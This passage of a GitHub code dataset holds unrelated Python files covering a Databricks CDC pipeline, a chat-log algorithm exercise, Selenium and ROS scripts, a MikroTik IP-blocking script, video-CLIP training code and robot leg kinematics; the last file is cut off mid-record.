COMMAND ----------\n\ndef generate_tables(table, keys):\n # this is the function for dynamically generating tables,\n # using the table metadata as the parameters.\n # in a more traditional silver/gold tables where you define\n # the sql for the table, you wouldn't need to do this\n \n bronze_name = f'bronze_{table}'\n pretty_name = f'cdc_pretty_view_{table}'\n silver_name = f'silver_{table}'\n silver_scd_1_name = f'silver_scd_1_{table}'\n silver_scd_2_name = f'silver_scd_2_{table}'\n \n cdc_columns = [\n '__$start_lsn',\n '__$end_lsn',\n '__$seqval',\n '__$operation',\n '__$update_mask',\n '__$command_id'\n ]\n \n cdc_order_columns = ['__$start_lsn', '__$command_id', '__$seqval', '__$operation']\n\n def add_global_order(df, colname):\n return df.withColumn(colname, F.concat(*cdc_order_columns).cast('binary'))\n \n cdc_columns_pretty = [c.replace('__$', '__') for c in cdc_columns]\n \n # auto loader currently does not support schema inference from parquet\n # this will be coming soon, but for the time being the schema will need to be managed\n # the way this is done below is not a good example of what should be done in production\n # it will get slower as the size of the staging location increases\n # instead, consider infering the schema on a smaller subset of the staging data,\n # or from managing it within the ingestion metadata database\n schema = spark.read.format('parquet').load(f'{staged_data_root}/{table}/*.parquet').schema\n \n @dlt.table(\n name=bronze_name,\n comment=f'raw bronze cdc data for {table}'\n )\n def create_bronze_table():\n return spark.readStream.format('cloudfiles').schema(schema).option('cloudfiles.format', 'parquet').load(f'{staged_data_root}/{table}/*.parquet')\n \n @dlt.view(\n name=pretty_name,\n comment=f'cleaner formatted version of raw cdc table {table}'\n )\n def create_cdc_pretty_view():\n df = add_global_order(dlt.read_stream(bronze_name), '__global_order')\n return (df\n .select([\"*\"] + [F.col(cdc_col).alias(cdc_col_pretty) for cdc_col, cdc_col_pretty in zip(cdc_columns, cdc_columns_pretty)])\n .drop(*cdc_columns)\n .filter(F.col('__operation') != 3) # ignore values prior to insert - not needed\n .withColumn(\"__operation\", F.when(F.col('__operation') == 1, 'DELETE')\n .when(F.col('__operation') == 2, 'INSERT')\n .when(F.col('__operation') == 4, 'UPDATE')\n .otherwise(F.lit(None))\n )\n )\n \n @dlt.table(\n name=f'silver_{table}',\n comment=f'Cleaner formatted version of raw cdc table {table}, maintaining full history'\n )\n def create_silver_table():\n return dlt.read_stream(pretty_name)\n \n dlt.create_target_table(\n name=silver_scd_1_name,\n comment=f'SCD type 1 version of cdc table {table}'\n )\n \n dlt.apply_changes(\n target = silver_scd_1_name,\n source = pretty_name,\n keys = keys,\n sequence_by = F.col(\"__global_order\"),\n apply_as_deletes = F.col('__operation') == 'DELETE',\n except_column_list = cdc_columns_pretty\n )\n \n dlt.create_target_table(\n name=silver_scd_2_name,\n comment=f'SCD type 2 version of cdc table {table}'\n )\n \n dlt.apply_changes(\n target = silver_scd_2_name,\n source = pretty_name,\n keys = keys,\n sequence_by = F.col(\"__seqval\"), #TODO: confirm with MSFT that seqval is the only column needed for ordering\n apply_as_deletes = F.col('__operation') == 'DELETE',\n except_column_list = cdc_columns_pretty,\n stored_as_scd_type = \"2\"\n )\n\n# COMMAND ----------\n\nfor table_config in get_tables_to_ingest():\n # spin up our ingestions in parallel\n generate_tables(table_config['name'], 
table_config['identity_cols'])\n","repo_name":"adrian-tompkins/dlt-workshop-2022-05-16","sub_path":"Lab 01 - Data Engineering/06 - Delta Live Tables (Python - CDC).py","file_name":"06 - Delta Live Tables (Python - CDC).py","file_ext":"py","file_size_in_byte":5479,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"56"} +{"seq_id":"884640261","text":"def solution(record):\n nick_dic = {}\n actions = []\n for i in record:\n s_record = i.split()\n\n if s_record[0] == \"Leave\":\n actions.append((0, s_record[1]))\n\n elif s_record[0] == \"Enter\":\n nick_dic[s_record[1]] = s_record[2]\n actions.append((1, s_record[1]))\n else:\n nick_dic[s_record[1]] = s_record[2]\n answer = []\n for i in actions:\n if i[0] == 0:\n answer.append(f\"{nick_dic[i[1]]}님이 나갔습니다.\")\n else:\n answer.append(f\"{nick_dic[i[1]]}님이 들어왔습니다.\")\n\n\n\n return answer\n\n\nanswer = solution([\"Enter uid1234 Muzi\", \"Enter uid4567 Prodo\",\"Leave uid1234\",\"Enter uid1234 Prodo\",\"Change uid4567 Ryan\"])\nfor i in answer:\n print(i)","repo_name":"mullung2727/Algorithm-","sub_path":"1111/lv2 오픈채팅방.py","file_name":"lv2 오픈채팅방.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"28863803570","text":"\nfrom selenium import webdriver\nimport time\nfrom selenium.webdriver import ActionChains\n\n\ndriver=webdriver.Chrome(executable_path=\"C:\\\\Drivers\\\\chromedriver.exe\")\n\ndriver.implicitly_wait(10)\n\ndriver.get(\"https://artoftesting.com/sampleSiteForSelenium\")\n\ndriver.maximize_window()\n\ntime.sleep(5)\n\ndblElement=driver.find_element_by_id(\"dblClkBtn\")\n\naction=ActionChains(driver)\n\naction.double_click(dblElement).perform()\n\ntime.sleep(5)\n\ndriver.quit()\n\n","repo_name":"rams4automation/SeleniumPython","sub_path":"SeleniumwithPython/Doublclik.py","file_name":"Doublclik.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"25336686334","text":"import rospy\nfrom typing import Dict, Tuple\nfrom archemist.core.processing.handler import StationHandler\nfrom archemist.core.state.station import Station\nfrom colorimetry_msgs.msg import ColorimetryCommand,ColorimetryRGBResult, ColorimetryLABResult\nfrom .state import SampleColorLABOpDescriptor, SampleColorRGBOpDescriptor\n\nclass LightBoxROSHandler(StationHandler):\n def __init__(self, station:Station):\n super().__init__(station)\n rospy.init_node(f'{self._station}_handler')\n self.pubCamera = rospy.Publisher(\"/colorimetry_station/command\", ColorimetryCommand, queue_size=1)\n rospy.Subscriber(\"/colorimetry_station/result_rgb\", ColorimetryRGBResult, self._colorimetry_rgb_callback)\n rospy.Subscriber(\"/colorimetry_station/result_lab\", ColorimetryLABResult, self._colorimetry_lab_callback)\n self._received_results = False\n self._op_results = {}\n rospy.sleep(1)\n \n\n def run(self):\n rospy.loginfo(f'{self._station}_handler is running')\n try:\n while not rospy.is_shutdown():\n self.handle()\n rospy.sleep(2)\n except KeyboardInterrupt:\n rospy.loginfo(f'{self._station}_handler is terminating!!!')\n\n def execute_op(self):\n current_op = self._station.get_assigned_station_op()\n self._received_results = False\n self._op_results = {}\n if isinstance(current_op, SampleColorRGBOpDescriptor):\n op_msg = ColorimetryCommand()\n op_msg.op_name = 'rgb'\n for i in range(10):\n self.pubCamera.publish(op_msg)\n elif 
isinstance(current_op, SampleColorLABOpDescriptor):\r\n op_msg = ColorimetryCommand()\r\n op_msg.op_name = 'lab'\r\n for i in range(10):\r\n self.pubCamera.publish(op_msg)\r\n else:\r\n rospy.logwarn(f'[{self.__class__.__name__}] Unknown operation was received')\r\n\r\n def is_op_execution_complete(self) -> bool:\r\n return self._received_results\r\n\r\n def get_op_result(self) -> Tuple[bool, Dict]:\r\n return True, self._op_results\r\n\r\n def _colorimetry_rgb_callback(self, msg: ColorimetryRGBResult):\r\n self._received_results = True\r\n self._op_results['result_filename'] = msg.result_file_name\r\n self._op_results['red_intensity'] = msg.red_intensity\r\n self._op_results['blue_intensity'] = msg.blue_intensity\r\n self._op_results['green_intensity'] = msg.green_intensity\r\n self._op_results['color_index'] = msg.color_index\r\n\r\n def _colorimetry_lab_callback(self, msg: ColorimetryLABResult):\r\n self._received_results = True\r\n self._op_results['result_filename'] = msg.result_file_name\r\n self._op_results['l_value'] = msg.L_value\r\n self._op_results['a_value'] = msg.a_value\r\n self._op_results['b_value'] = msg.b_value\r\n self._op_results['color_index'] = msg.color_index\r\n\r\n \r\n","repo_name":"cooper-group-uol-robotics/archemist","sub_path":"src/archemist/stations/lightbox_station/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2920,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"56"} +{"seq_id":"32308466928","text":"#!/usr/bin/python3\nfrom netmiko import ConnectHandler\n\ndef connect_to_mikrotik(list):\n print(\"[!]Check your device type. Be sure this is the mikrotik and it has a mikrotik-routerOS[!]\")\n print(\"[!]Check configuration in mikrotik_main-router[!]\")\n print(\"[!]Establishing connection...[!]\")\n\n mikrotik_main_router = {\n 'device_type':'mikrotik_routeros',\n 'host':'192.168.88.1',\n 'port':'22',\n 'username':'admin',\n 'password':'',\n 'global_cmd_verify': False\n\n }\n sshCli = ConnectHandler(**mikrotik_main_router)\n for ip in list:\n command = \"/ip firewall filter add chain=forward src-address=\" + ip + \" action=drop comment=BlockedByScript\"\n sshCli.send_command(command)\n print(\"IP: \" + ip + \" was banned\")\n\n sshCli.disconnect()\n\nip_addresses = []\ndef read_ip():\n global ip_addresses\n filename = \"ip_lists.txt\"\n with open(filename,'r') as f:\n ip_addresses = f.read().split()\n\nread_ip()\nconnect_to_mikrotik(ip_addresses)\n","repo_name":"superbars/ip-banner-mikrotik","sub_path":"automatic.py","file_name":"automatic.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"4581111837","text":"#!/usr/bin/env python3\nfrom n_choose_k import choose\n\"\"\"\nThe choose function returns ways to choose k sized subset from a n sized set\nGetting the coefficients from choose() function we can divide each of them by 2^(layers-1) \nand append the values to the fractions array.\nThe fractions array then contains the fraction of all beads going in the bins for the range of bins given\nSo THE CONCENTRATION of beads in bins is just the sum of all elements times 100\n\"\"\"\n\ndef main(n, start, stop):\n fractions = []\n #iterate through all favourable values of k\n for k in range(start, stop+1):\n #calculate the fraction\n fract = choose(n, k)/2**n\n fractions.append(fract)\n\n #uncomment the following line to get a more verbose output\n #print(f\"TRACKING- k:{k} _______ fraction={fract}\")\n #calculate and print the concentration\n 
print(\"Concentration: \",sum(fractions)*100)\n\nif __name__ == \"__main__\":\n n = int(input(\"Enter layers on board:\"))-1\n print(\"Enter the start and stop point of values of k:-\")\n start = int(input(\"(K) start point:\"))\n stop = int(input(\"(K) end point:\"))\n main(n, start, stop)\n","repo_name":"roushan004/Discrete-Mathematics","sub_path":"Course2_scripts/Galton_board_solution.py","file_name":"Galton_board_solution.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"56"} +{"seq_id":"32916646472","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport argparse\nimport lmdb\nimport numpy as np\n\nfrom proto import utils\nfrom proto import tensor_pb2\n\n\ndef create_db(output_file):\n print(\">>> Write database...\")\n LMDB_MAP_SIZE = 1 << 40 # MODIFY\n print(LMDB_MAP_SIZE)\n env = lmdb.open(output_file, map_size=LMDB_MAP_SIZE)\n\n checksum = 0\n with env.begin(write=True) as txn:\n for j in range(0, 1024):\n # MODIFY: add your own data reader / creator\n width = 64\n height = 32\n img_data = np.random.rand(3, width, height).astype(np.float32)\n label = np.asarray(j % 10)\n\n # Create TensorProtos\n tensor_protos = tensor_pb2.TensorProtos()\n img_tensor = utils.numpy_array_to_tensor(img_data)\n tensor_protos.protos.extend([img_tensor])\n\n label_tensor = utils.numpy_array_to_tensor(label)\n tensor_protos.protos.extend([label_tensor])\n txn.put(\n '{}'.format(j).encode('ascii'),\n tensor_protos.SerializeToString()\n )\n\n if (j % 16 == 0):\n print(\"Inserted {} rows\".format(j))\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"LMDB creation\"\n )\n parser.add_argument(\"--output_file\", type=str, default=None,\n help=\"Path to write the database to\",\n required=True)\n args = parser.parse_args()\n\n create_db(args.output_file)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"npuichigo/pytorch_lmdb_dataset","sub_path":"create_lmdb.py","file_name":"create_lmdb.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"56"} +{"seq_id":"38966200927","text":"import os\nimport sys\nimport time\nimport argparse\n\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nfrom torch.nn.parallel import DistributedDataParallel\nimport torch.distributed as dist\nimport torch.backends.cudnn as cudnn\nfrom torch.cuda.amp import GradScaler\nimport torchvision\nimport torch.optim as optim\nfrom utils.utils import init_distributed_mode, AverageMeter, reduce_tensor, accuracy\nfrom utils.logger import setup_logger\nimport clip\n\nfrom pathlib import Path\nimport yaml\nimport pprint\nfrom dotmap import DotMap\nimport numpy as np\n\nimport datetime\nimport shutil\nfrom contextlib import suppress\n\n\nfrom datasets import Video_dataset\nfrom modules.video_clip import video_header, VideoCLIP\nfrom utils.Augmentation import get_augmentation\nfrom utils.solver import _lr_scheduler\nfrom modules.text_prompt import text_prompt\n\n\n\n\ndef epoch_saving(epoch, model, optimizer, filename):\n torch.save({\n 'epoch': epoch,\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict(),\n }, filename) #just change to your preferred folder/filename\n\ndef best_saving(working_dir, epoch, model, optimizer):\n best_name = '{}/model_best.pt'.format(working_dir)\n 
torch.save({\n 'epoch': epoch,\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict(),\n }, best_name) # just change to your preferred folder/filename\n\n\ndef update_dict(dict):\n new_dict = {}\n for k, v in dict.items():\n new_dict[k.replace('module.', '')] = v\n return new_dict\n\ndef get_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument('--config', '-cfg', type=str, default='clip.yaml', help='global config file')\n parser.add_argument('--log_time', default='001')\n parser.add_argument('--dist_url', default='env://',\n help='url used to set up distributed training')\n parser.add_argument('--world_size', default=1, type=int,\n help='number of distributed processes') \n parser.add_argument(\"--local_rank\", type=int,\n help='local rank for DistributedDataParallel')\n parser.add_argument(\n \"--precision\",\n choices=[\"amp\", \"fp16\", \"fp32\"],\n default=\"amp\",\n help=\"Floating point precision.\"\n ) \n args = parser.parse_args()\n return args\n\n\n\ndef main(args):\n global best_prec1\n \"\"\" Training Program \"\"\"\n init_distributed_mode(args)\n if args.distributed:\n print('[INFO] turn on distributed train', flush=True)\n else:\n print('[INFO] turn off distributed train', flush=True)\n\n with open(args.config, 'r') as f:\n config = yaml.load(f, Loader=yaml.FullLoader)\n\n if 'shot' in config['data']:\n working_dir = os.path.join('./exp_fewshot', config['data']['dataset'], config['network']['arch'] , args.log_time)\n else:\n working_dir = os.path.join('./exp', config['data']['dataset'], config['network']['arch'] , args.log_time)\n\n if dist.get_rank() == 0:\n Path(working_dir).mkdir(parents=True, exist_ok=True)\n shutil.copy(args.config, working_dir)\n shutil.copy('train.py', working_dir)\n\n\n # build logger, print env and config\n logger = setup_logger(output=working_dir,\n distributed_rank=dist.get_rank(),\n name=f'Text4Vis')\n logger.info(\"------------------------------------\")\n logger.info(\"Environment Versions:\")\n logger.info(\"- Python: {}\".format(sys.version))\n logger.info(\"- PyTorch: {}\".format(torch.__version__))\n logger.info(\"- TorchVision: {}\".format(torchvision.__version__))\n logger.info(\"------------------------------------\")\n pp = pprint.PrettyPrinter(indent=4)\n logger.info(pp.pformat(config))\n logger.info(\"------------------------------------\")\n logger.info(\"storing name: {}\".format(working_dir))\n\n\n\n config = DotMap(config)\n\n device = \"cpu\"\n if torch.cuda.is_available():\n device = \"cuda\"\n cudnn.benchmark = True\n\n # fix the seed for reproducibility\n seed = config.seed + dist.get_rank()\n torch.manual_seed(seed)\n np.random.seed(seed)\n\n # get fp16 model and weight\n model, clip_state_dict = clip.load(\n config.network.arch,\n device='cpu',jit=False,\n internal_modeling=config.network.tm,\n T=config.data.num_segments,\n dropout=config.network.drop_out,\n emb_dropout=config.network.emb_dropout,\n pretrain=config.network.init,\n joint_st=config.network.joint_st) # Must set jit=False for training\n\n transform_train = get_augmentation(True, config)\n transform_val = get_augmentation(False, config)\n\n # if config.data.randaug.N:\n # transform_train = randAugment(transform_train, config)\n\n logger.info('train transforms: {}'.format(transform_train.transforms))\n logger.info('val transforms: {}'.format(transform_val.transforms))\n\n\n video_head = video_header(\n config.network.sim_header,\n clip_state_dict)\n\n \n if args.precision == \"amp\" or args.precision == \"fp32\":\n 
model = model.float()\n\n\n train_data = Video_dataset(\n config.data.train_root, config.data.train_list,\n config.data.label_list, num_segments=config.data.num_segments,\n modality=config.data.modality,\n image_tmpl=config.data.image_tmpl, random_shift=config.data.random_shift,\n transform=transform_train, dense_sample=config.data.dense)\n \n ################ Few-shot data for training ###########\n if config.data.shot:\n cls_dict = {}\n for item in train_data.video_list:\n if item.label not in cls_dict:\n cls_dict[item.label] = [item]\n else:\n cls_dict[item.label].append(item)\n import random\n select_vids = []\n K = config.data.shot\n for category, v in cls_dict.items():\n slice = random.sample(v, K)\n select_vids.extend(slice)\n n_repeat = len(train_data.video_list) // len(select_vids)\n train_data.video_list = select_vids * n_repeat\n # print('########### number of videos: {} #########'.format(len(select_vids)))\n ########################################################\n\n\n\n train_sampler = torch.utils.data.distributed.DistributedSampler(train_data) \n train_loader = DataLoader(train_data,\n batch_size=config.data.batch_size, num_workers=config.data.workers,\n sampler=train_sampler, drop_last=False)\n\n val_data = Video_dataset(\n config.data.val_root, config.data.val_list, config.data.label_list,\n random_shift=False, num_segments=config.data.num_segments,\n modality=config.data.modality,\n image_tmpl=config.data.image_tmpl,\n transform=transform_val, dense_sample=config.data.dense)\n val_sampler = torch.utils.data.distributed.DistributedSampler(val_data)\n val_loader = DataLoader(val_data,\n batch_size=config.data.batch_size,num_workers=config.data.workers,\n sampler=val_sampler, drop_last=False)\n\n\n classes, _, text_dict = text_prompt(train_data)\n n_class = text_dict[0].size(0)\n #### generate classes feature ######\n class_feats_file = 'text_feats_{}_{}.pt'.format(config['data']['dataset'], config['network']['arch']).replace('/','')\n if os.path.isfile(class_feats_file):\n logger.info('=> load classes features from {}'.format(class_feats_file))\n classes_features = torch.load(class_feats_file)\n else:\n model.eval()\n with torch.no_grad():\n classes_features = model.encode_text(classes) # [n_class dim]\n # if dist.get_rank() == 0:\n # torch.save(classes_features.cpu(), class_feats_file)\n \n # random init\n # classes_features = torch.empty(n_class, config.network.n_emb)\n # nn.init.normal_(classes_features, std=1)\n\n # distilbert init\n # classes_features = torch.load('distilbert-base-k400.pt')\n\n # QR init\n # normal_init = np.array(np.random.normal(size=(config.network.n_emb,config.network.n_emb)), dtype='float32')\n # qq, rr = np.linalg.qr(normal_init, mode=\"complete\")\n # classes_features = torch.tensor(qq[:n_class])\n\n # LDA init\n # classes_features = torch.load('lda_0.1.pt').float()\n\n model_full = VideoCLIP(model, video_head, config.data.num_segments)\n\n\n criterion = torch.nn.CrossEntropyLoss()\n\n start_epoch = config.solver.start_epoch\n \n if config.pretrain:\n if os.path.isfile(config.pretrain):\n logger.info(\"=> loading checkpoint '{}'\".format(config.pretrain))\n checkpoint = torch.load(config.pretrain, map_location='cpu')\n model_full.load_state_dict(checkpoint['model_state_dict'])\n del checkpoint\n else:\n logger.info(\"=> no checkpoint found at '{}'\".format(config.resume))\n \n if config.resume:\n if os.path.isfile(config.resume):\n logger.info(\"=> loading checkpoint '{}'\".format(config.resume))\n checkpoint = torch.load(config.resume, 
map_location='cpu')\n model_full.load_state_dict(update_dict(checkpoint['model_state_dict']))\n start_epoch = checkpoint['epoch'] + 1\n logger.info(\"=> loaded checkpoint '{}' (epoch {})\"\n .format(config.evaluate, checkpoint['epoch']))\n del checkpoint\n else:\n logger.info(\"=> no checkpoint found at '{}'\".format(config.pretrain))\n\n\n\n\n clip_params = []\n other_params = []\n for name, param in model_full.named_parameters(): \n if 'visual' in name and 'control_point' not in name:\n clip_params.append(param)\n elif 'logit_scale' in name:\n clip_params.append(param)\n else:\n other_params.append(param)\n optimizer = optim.AdamW([{'params': clip_params, 'lr': config.solver.lr * config.solver.clip_ratio}, \n {'params': other_params, 'lr': config.solver.lr}],\n betas=(0.9, 0.999), lr=config.solver.lr, eps=1e-8,\n weight_decay=config.solver.weight_decay) \n\n lr_scheduler = _lr_scheduler(config, optimizer)\n\n if args.distributed:\n model_full = DistributedDataParallel(model_full.cuda(), device_ids=[args.gpu])\n model_without_ddp = model_full.module\n\n\n scaler = GradScaler() if args.precision == \"amp\" else None\n\n\n best_prec1 = 0.0\n if config.solver.evaluate:\n logger.info((\"===========evaluate===========\"))\n prec1 = validate(\n start_epoch,\n val_loader, device, \n model_full, config, classes_features, logger)\n return\n\n\n\n for epoch in range(start_epoch, config.solver.epochs):\n if args.distributed:\n train_loader.sampler.set_epoch(epoch) \n\n train(model_full, train_loader, optimizer, criterion, scaler,\n epoch, device, lr_scheduler, config, classes_features, logger)\n\n if (epoch+1) % config.logging.eval_freq == 0: # and epoch>0\n prec1 = validate(epoch, val_loader, device, model_full, config, classes_features, logger)\n\n if dist.get_rank() == 0:\n is_best = prec1 > best_prec1\n best_prec1 = max(prec1, best_prec1)\n logger.info('Testing: {}/{}'.format(prec1,best_prec1))\n logger.info('Saving:')\n filename = \"{}/last_model.pt\".format(working_dir)\n\n epoch_saving(epoch, model_without_ddp, optimizer, filename)\n if is_best:\n best_saving(working_dir, epoch, model_without_ddp, optimizer)\n\n\ndef train(model, train_loader, optimizer, criterion, scaler,\n epoch, device, lr_scheduler, config, text_embedding, logger):\n \"\"\" train a epoch \"\"\"\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n\n model.train()\n autocast = torch.cuda.amp.autocast if args.precision == 'amp' else suppress\n end = time.time()\n for i,(images, list_id) in enumerate(train_loader):\n if config.solver.type != 'monitor':\n if (i + 1) == 1 or (i + 1) % 10 == 0:\n lr_scheduler.step(epoch + i / len(train_loader))\n # lr_scheduler.step()\n\n data_time.update(time.time() - end)\n # b t3 h w\n images = images.view((-1, config.data.num_segments, 3) + images.size()[-2:]) # bt 3 h w\n\n b, t, c, h, w = images.size()\n\n images= images.view(-1, c, h, w) # omit the Image.fromarray if the images already in PIL format, change this line to images=list_image if using preprocess inside the dataset class\n\n with autocast():\n logits = model(images, text_embedding) # B 400\n loss = criterion(logits, list_id.to(device))\n\n # loss regularization\n loss = loss / config.solver.grad_accumulation_steps\n\n if scaler is not None:\n # back propagation\n scaler.scale(loss).backward()\n\n if (i + 1) % config.solver.grad_accumulation_steps == 0:\n scaler.step(optimizer) \n scaler.update() \n optimizer.zero_grad() # reset gradient\n \n else:\n # back propagation\n loss.backward()\n if (i 
+ 1) % config.solver.grad_accumulation_steps == 0:\n optimizer.step() # update param\n optimizer.zero_grad() # reset gradient\n\n losses.update(loss.item(), logits.size(0))\n\n\n batch_time.update(time.time() - end)\n end = time.time() \n\n\n cur_iter = epoch * len(train_loader) + i\n max_iter = config.solver.epochs * len(train_loader)\n eta_sec = batch_time.avg * (max_iter - cur_iter + 1)\n eta_sec = str(datetime.timedelta(seconds=int(eta_sec))) \n\n if i % config.logging.print_freq == 0:\n logger.info(('Epoch: [{0}][{1}/{2}], lr: {lr:.2e}, eta: {3}\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Data {data_time.val:.3f} ({data_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})'.format(\n epoch, i, len(train_loader), eta_sec, batch_time=batch_time, data_time=data_time, loss=losses,\n lr=optimizer.param_groups[-1]['lr']))) # TODO\n\n\n\n\ndef validate(epoch, val_loader, device, model, config, text_embedding, logger):\n top1 = AverageMeter()\n top5 = AverageMeter()\n model.eval()\n with torch.no_grad():\n for i, (image, class_id) in enumerate(val_loader):\n image = image.view((-1, config.data.num_segments, 3) + image.size()[-2:])\n b, t, c, h, w = image.size()\n class_id = class_id.to(device)\n text_embedding = text_embedding.to(device)\n image = image.to(device).view(-1, c, h, w)\n\n image_embedding = model.module.encode_image(image)\n image_embedding /= image_embedding.norm(dim=-1, keepdim=True)\n text_embedding /= text_embedding.norm(dim=-1, keepdim=True)\n similarity = (100.0 * image_embedding @ text_embedding.T)\n\n prec = accuracy(similarity, class_id, topk=(1, 5))\n prec1 = reduce_tensor(prec[0])\n prec5 = reduce_tensor(prec[1])\n\n top1.update(prec1.item(), class_id.size(0))\n top5.update(prec5.item(), class_id.size(0))\n\n if i % config.logging.print_freq == 0:\n logger.info(\n ('Test: [{0}/{1}]\\t'\n 'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\\t'\n 'Prec@5 {top5.val:.3f} ({top5.avg:.3f})'.format(\n i, len(val_loader), top1=top1, top5=top5)))\n\n logger.info(('Testing Results: Prec@1 {top1.avg:.3f} Prec@5 {top5.avg:.3f}'\n .format(top1=top1, top5=top5)))\n return top1.avg\n\n\nif __name__ == '__main__':\n args = get_parser() \n main(args)\n\n","repo_name":"whwu95/Text4Vis","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":16108,"program_lang":"python","lang":"en","doc_type":"code","stars":147,"dataset":"github-code","pt":"56"} +{"seq_id":"2797340482","text":"import numpy as np\nfrom transforms3d.euler import euler2mat\n\n\ndef leg_explicit_inverse_kinematics(r_body_foot, leg_index, config):\n \"\"\"Find the joint angles corresponding to the given body-relative foot position for a given leg and configuration\n \n Parameters\n ----------\n r_body_foot : [type]\n [description]\n leg_index : [type]\n [description]\n config : [type]\n [description]\n \n Returns\n -------\n numpy array (3)\n Array of corresponding joint angles.\n \"\"\"\n (x, y, z) = r_body_foot\n\n # Distance from the leg origin to the foot, projected into the y-z plane\n R_body_foot_yz = (y ** 2 + z ** 2) ** 0.5\n\n # Distance from the leg's forward/back point of rotation to the foot\n R_hip_foot_yz = (R_body_foot_yz ** 2 - config.ABDUCTION_OFFSET ** 2) ** 0.5\n\n # Interior angle of the right triangle formed in the y-z plane by the leg that is coincident to the ab/adduction axis\n # For feet 2 (front left) and 4 (back left), the abduction offset is positive, for the right feet, the abduction offset is negative.\n arccos_argument = config.ABDUCTION_OFFSETS[leg_index] / 
R_body_foot_yz\n arccos_argument = np.clip(arccos_argument, -0.99, 0.99)\n phi = np.arccos(arccos_argument)\n\n # Angle of the y-z projection of the hip-to-foot vector, relative to the positive y-axis\n hip_foot_angle = np.arctan2(z, y)\n\n # Ab/adduction angle, relative to the positive y-axis\n abduction_angle = phi + hip_foot_angle\n\n # theta: Angle between the tilted negative z-axis and the hip-to-foot vector\n theta = np.arctan2(-x, R_hip_foot_yz)\n\n # Distance between the hip and foot\n R_hip_foot = (R_hip_foot_yz ** 2 + x ** 2) ** 0.5\n\n # Angle between the line going from hip to foot and the link L1\n arccos_argument = (config.LEG_L1 ** 2 + R_hip_foot ** 2 - config.LEG_L2 ** 2) / (\n 2 * config.LEG_L1 * R_hip_foot\n )\n arccos_argument = np.clip(arccos_argument, -0.99, 0.99)\n trident = np.arccos(arccos_argument)\n\n # Angle of the first link relative to the tilted negative z axis\n hip_angle = theta + trident\n\n # Angle between the leg links L1 and L2\n arccos_argument = (config.LEG_L1 ** 2 + config.LEG_L2 ** 2 - R_hip_foot ** 2) / (\n 2 * config.LEG_L1 * config.LEG_L2\n )\n arccos_argument = np.clip(arccos_argument, -0.99, 0.99)\n beta = np.arccos(arccos_argument)\n\n # Angle of the second link relative to the tilted negative z axis\n knee_angle = hip_angle - (np.pi - beta)\n\n return np.array([abduction_angle, hip_angle, knee_angle])\n\n\ndef four_legs_inverse_kinematics(r_body_foot, config):\n \"\"\"Find the joint angles for all twelve DOF correspoinding to the given matrix of body-relative foot positions.\n \n Parameters\n ----------\n r_body_foot : numpy array (3,4)\n Matrix of the body-frame foot positions. Each column corresponds to a separate foot.\n config : Config object\n Object of robot configuration parameters.\n \n Returns\n -------\n numpy array (3,4)\n Matrix of corresponding joint angles.\n \"\"\"\n alpha = np.zeros((3, 4))\n for i in range(4):\n body_offset = config.LEG_ORIGINS[:, i]\n alpha[:, i] = leg_explicit_inverse_kinematics(\n r_body_foot[:, i] - body_offset, i, config\n )\n return alpha\n","repo_name":"stanfordroboticsclub/StanfordQuadruped","sub_path":"pupper/Kinematics.py","file_name":"Kinematics.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","stars":1364,"dataset":"github-code","pt":"56"} +{"seq_id":"40376414456","text":"\"\"\"\nDefine graph class\n\"\"\"\nfrom collections import defaultdict\nfrom typing import Callable\nfrom networkx import Graph, DiGraph\nimport tqdm\n\n\nclass TransactionGraph:\n def __init__(self, *, transaction_file=None, total_time_steps: int = None):\n self.time_series_graph = dict()\n if transaction_file is not None:\n self._construct_from_file(transaction_file, total_time_steps)\n\n def _construct_from_file(self, transaction_file, total_time_steps: int = None):\n graph_generator = GraphGenerator(transaction_file)\n all_time_steps = graph_generator.time_steps\n if total_time_steps is not None:\n all_time_steps = all_time_steps[:total_time_steps]\n\n for time_step in tqdm.tqdm(all_time_steps):\n self.time_series_graph[time_step] = DiGraph()\n self.time_series_graph[time_step].add_edges_from(graph_generator.generate_edges(self.get_filter(time_step)))\n\n def get_filter(self, specified_time_step: int):\n def should_exclude(from_address: str, to_address: str, amount: float, time_step: int):\n return time_step != specified_time_step\n\n return should_exclude\n\nclass GraphGenerator:\n def __init__(self, transaction_file):\n self.transaction_file = transaction_file\n 
